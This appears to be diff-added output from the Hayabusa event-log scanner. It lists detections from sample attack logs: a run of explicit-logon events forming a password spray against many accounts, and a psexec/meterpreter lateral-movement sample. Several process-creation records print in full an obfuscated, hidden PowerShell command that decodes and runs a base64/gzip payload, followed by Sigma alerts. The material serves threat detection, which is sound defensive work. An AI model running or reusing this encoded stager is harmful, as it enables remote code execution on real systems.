+2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:03.525 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:drook/bgalbraith/edygert/jorchilles/bking/jlake/mdouglas/cspizor/bgreenwood/smisenar/ssims/cragoso/dmashburn/baker IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
+2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 05:26:51.793 +09:00,IEWIN7,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Exec,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3348 | PGUID: 365ABB72-AF8B-5CC8-0000-00101C1A1900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec | C2,Curl Start Combination,,rules/sigma/process_creation/proc_creation_win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,info,,Process Created,"Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 3872 | PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hl